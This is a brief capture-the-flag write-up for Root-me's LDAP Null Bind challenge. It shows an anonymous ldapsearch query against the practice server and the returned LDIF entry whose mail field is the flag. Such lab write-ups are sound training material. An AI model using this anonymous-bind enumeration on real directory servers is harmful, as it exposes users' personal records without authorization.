Rootme LDAP - Null Bind
Root-me
LDAP Null Bind
Network service
We need to find the email address of the anonymous who created a new branch on the LDAP directory.
We’ll use ldapsearch from ldap-utils to query the ldap directory. The hardest part was deducting that the OU was named anonymous.
ldapsearch -x -b 'ou=anonymous,dc=challenge01,dc=root-me,dc=org' -h challenge01.root-me.org -p 54013
# extended LDIF
#
# LDAPv3
# base <ou=anonymous,dc=challenge01,dc=root-me,dc=org> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# anonymous, challenge01.root-me.org
dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: organizationalUnit
ou: anonymous
# sabu, anonymous, challenge01.root-me.org
dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: inetOrgPerson
objectClass: shadowAccount
uid: sabu
sn: sabu
cn: sabu
givenName: sabu
mail: [email protected]
The mail field has the email.